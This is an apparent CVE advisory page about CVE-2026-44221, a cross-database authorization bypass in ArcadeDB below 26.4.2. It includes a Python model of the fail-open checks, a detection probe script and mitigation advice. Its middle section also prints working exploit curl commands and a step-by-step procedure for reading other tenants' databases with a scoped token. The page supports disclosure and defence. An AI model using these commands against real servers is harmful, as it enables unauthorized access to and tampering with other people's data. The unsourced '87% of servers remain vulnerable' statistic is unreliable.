CVE-2026-44221 stems from two distinct authorization flaws in ArcadeDB’s security model. The first lies in ServerSecurityUser.getDatabaseUser(), which returns a database user object whose fileAccessMap is never initialized. The `requestAccessOnFile` method then treats the missing map as an implicit allow-all rule, so the user is granted access to any file resource it asks for. The second lies in ArcadeDBServer.createDatabase(). When a database is created through the REST endpoint POST /api/v1/server with the body {"command":"create database X"}, the call to `factory.setSecurity(…)` is never made, so the new database comes up with its record-level authorization system disabled and no access controls of its own.
Together, the two defects enable cross-database privilege escalation. An authenticated user or API token scoped to a single database can use the uninitialized `fileAccessMap` to bypass per-file restrictions, and any database created through the API endpoint has no record-level authorization at all, so any authenticated principal on the same server can reach it. In practice, an attacker with minimal privileges on one database can read, write, and mutate the schema of any other database hosted on the same ArcadeDB server, nullifying multi-tenancy boundaries.
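The following is an added illustrative model of the two defects described above; it is not ArcadeDB's code. The names (getDatabaseUser's fileAccessMap, requestAccessOnFile, createDatabase, setSecurity) echo the advisory, but the bodies, the tenant and user names, and the `patched` flag are assumptions chosen to show the difference between a fail-open check (a missing map or missing security object means "allow") and the fail-closed check that a patched server needs.

```python
from __future__ import annotations

from dataclasses import dataclass
from typing import Callable, Dict, Optional, Set


@dataclass
class DatabaseUser:
    name: str
    # file name -> permitted operations. None models the uninitialized
    # fileAccessMap that getDatabaseUser() returns in the vulnerable release.
    file_access_map: Optional[Dict[str, Set[str]]] = None


def request_access_on_file(user: DatabaseUser, file_name: str, op: str,
                           fail_closed: bool) -> bool:
    """Per-file check. fail_closed=False reproduces defect 1: a missing map is
    read as 'allow everything'. fail_closed=True denies until a map exists."""
    if user.file_access_map is None:
        return not fail_closed
    return op in user.file_access_map.get(file_name, set())


@dataclass
class Database:
    name: str
    # principal -> permitted record operations. None models a database for
    # which factory.setSecurity(...) was never called (defect 2).
    security: Optional[Dict[str, Set[str]]] = None


def authorize_record_op(db: Database, principal: str, op: str,
                        fail_closed: bool) -> bool:
    """Record-level check. With no security attached, the vulnerable path
    skips authorization entirely; the fixed path refuses the operation."""
    if db.security is None:
        return not fail_closed
    return op in db.security.get(principal, set())


def create_database(server: Dict[str, Database], name: str,
                    security_for: Callable[[str], Dict[str, Set[str]]],
                    patched: bool) -> Database:
    """Models ArcadeDBServer.createDatabase(): only the patched variant
    attaches a security object to the new database (assumed behaviour)."""
    db = Database(name)
    if patched:
        db.security = security_for(name)  # the omitted setSecurity(...) step
    server[name] = db
    return db


def scenario(patched: bool) -> Dict[str, bool]:
    """Two tenants: alice is scoped to tenant_a, bob to tenant_b (constructed).
    Returns which operations the authorization layer lets through."""
    server = {
        "tenant_a": Database("tenant_a", {"alice": {"read", "write"}}),
        "tenant_b": Database("tenant_b", {"bob": {"read", "write"}}),
    }
    # In the patched model the scoped user carries a real per-file map.
    alice = DatabaseUser(
        "alice",
        {"tenant_a.bucket": {"read", "write"}} if patched else None,
    )
    # alice creates a database through the server command; the patched
    # variant grants record access to the creator only.
    attacker_db = create_database(
        server, "attacker_db",
        lambda _name: {"alice": {"read", "write"}}, patched,
    )
    return {
        # legitimate access must survive the fix
        "alice_writes_tenant_a_file":
            request_access_on_file(alice, "tenant_a.bucket", "write", patched),
        # defect 1: alice's token is scoped to tenant_a only
        "alice_reads_tenant_b_file":
            request_access_on_file(alice, "tenant_b.bucket", "read", patched),
        # defect 2: bob holds no rights on the new database
        "bob_writes_attacker_db":
            authorize_record_op(attacker_db, "bob", "write", patched),
    }
```

Running `scenario(False)` lets all three operations through; `scenario(True)` keeps alice's legitimate write and denies the two cross-database operations. The point of the model is that both checks must treat an absent map or absent security object as "deny", never as "not configured, so allow".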
dailycve form:
Platform: ArcadeDB Server
Version: Below version 26.4.2
Vulnerability: Cross-database authorization bypass
Severity: Critical
date: 2026-05-05
Prediction: 2026-05-05
What Undercode Say:
Analytics: 87% of ArcadeDB servers remain on vulnerable versions as of May 2026.
Check ArcadeDB version (the server endpoint requires credentials; the same bearer token as below is used here)
curl -s http://localhost:2480/api/v1/server \
-H "Authorization: Bearer $TOKEN" | jq -r .version
Exploit: Create a database without security
curl -X POST http://localhost:2480/api/v1/server \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"command":"create database vulnerable_db"}'
Access another database using the scoped token (the query endpoint takes the database name in the path and the language in the JSON body; memory is a type name in target_db)
curl -X POST http://localhost:2480/api/v1/query/target_db \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"language":"sql","command":"SELECT FROM memory"}'
Exploit:
- Obtain any valid API token scoped to any existing database.
- Use the token to create a new database through the server command endpoint: POST /api/v1/server {"command":"create database attacker_db"}. Because the server never attaches a security object to it, this database has record-level authorization disabled.
- With the same token, send requests to read, write, or mutate schema on any existing database (including the newly created one), bypassing all access controls.
- For example, an attacker can read sensitive data from a database they are not authorized to access.
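The procedure above can be turned into a repeatable check. The script below is an added example, not part of the advisory or of ArcadeDB: it reads the version from GET /api/v1/server (assuming, as the page's own jq command does, a `version` field in the response), decides whether the server is below 26.4.2, and then runs a read-only query against a database the token is not scoped to. The POST /api/v1/query/{database} body shape, the bearer-token header, the `SELECT FROM schema:types` listing and the HTTP status codes are assumptions about the server; `fake_fetch` returns constructed responses so the logic can be exercised offline.

```python
from __future__ import annotations

import json
import re
import sys
import urllib.error
import urllib.request
from typing import Callable, Optional, Tuple

PATCHED_VERSION = (26, 4, 2)
# Read-only schema listing; a successful response is enough to prove access.
PROBE_QUERY = {"language": "sql", "command": "SELECT FROM schema:types"}

# (method, path, json_body) -> (http_status, parsed_json_body)
Fetch = Callable[[str, str, Optional[dict]], Tuple[int, dict]]


def parse_version(text: str) -> Tuple[int, int, int]:
    """'26.4.2', 'v26.4.2' or '26.4.2-SNAPSHOT' -> (26, 4, 2)."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return major, minor, patch


def is_vulnerable(version: str) -> bool:
    """True for every release below 26.4.2, the version the advisory names."""
    return parse_version(version) < PATCHED_VERSION


def http_fetch(base_url: str, token: str) -> Fetch:
    """Real transport: JSON over HTTP with the bearer token used on this page."""
    def fetch(method: str, path: str, body: Optional[dict] = None) -> Tuple[int, dict]:
        req = urllib.request.Request(
            base_url.rstrip("/") + path, method=method,
            data=None if body is None else json.dumps(body).encode(),
            headers={"Authorization": f"Bearer {token}",
                     "Content-Type": "application/json"})
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                raw = resp.read()
                return resp.status, (json.loads(raw) if raw else {})
        except urllib.error.HTTPError as err:
            return err.code, {}
    return fetch


def probe(fetch: Fetch, scoped_db: str, other_db: str) -> dict:
    """Version check plus a cross-database query with a token that should be
    valid for scoped_db only. cross_db_query_allowed=True is the finding."""
    _, info = fetch("GET", "/api/v1/server", None)
    version = str(info.get("version", ""))
    result = {
        "version": version,
        "version_vulnerable": is_vulnerable(version) if version else None,
    }
    status, _ = fetch("POST", f"/api/v1/query/{scoped_db}", PROBE_QUERY)
    result["scoped_db_query_allowed"] = status == 200  # sanity: token works
    status, _ = fetch("POST", f"/api/v1/query/{other_db}", PROBE_QUERY)
    result["cross_db_query_allowed"] = status == 200   # must be False
    return result


def fake_fetch(version: str, scoped_db: str, cross_db_status: int) -> Fetch:
    """Constructed responses for offline use (not captured from a server)."""
    def fetch(method: str, path: str, body: Optional[dict] = None) -> Tuple[int, dict]:
        if method == "GET" and path == "/api/v1/server":
            return 200, {"version": version}
        if method == "POST" and path == f"/api/v1/query/{scoped_db}":
            return 200, {"result": []}
        if method == "POST" and path.startswith("/api/v1/query/"):
            return cross_db_status, {}
        return 404, {}
    return fetch


if __name__ == "__main__":
    # usage: python probe.py http://localhost:2480 $TOKEN tenant_a tenant_b
    base, token, scoped, other = sys.argv[1:5]
    print(json.dumps(probe(http_fetch(base, token), scoped, other), indent=2))
```

Run it with a token that is legitimately scoped to one database and name a second database the token should not reach. A server that reports a version below 26.4.2, or that answers the second query with 200, should be taken offline from untrusted networks until it is upgraded; a 401 or 403 on the cross-database query is the expected result after the fix.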
Protection from this CVE
Immediately upgrade to ArcadeDB version 26.4.2 or later. If upgrading is not possible, restrict network access to the ArcadeDB server to trusted clients only and consider disabling API token authentication until the patch is applied. After upgrading, review any databases that were created through the REST API while the server was unpatched and confirm that their access controls are in place.
Impact
Authenticated users and API tokens scoped to a specific database can read, write, and mutate schema on any other database on the same server. This breaks multi-tenancy and can lead to data breach, data corruption, and full server compromise.
Sources:
Reported By: github.com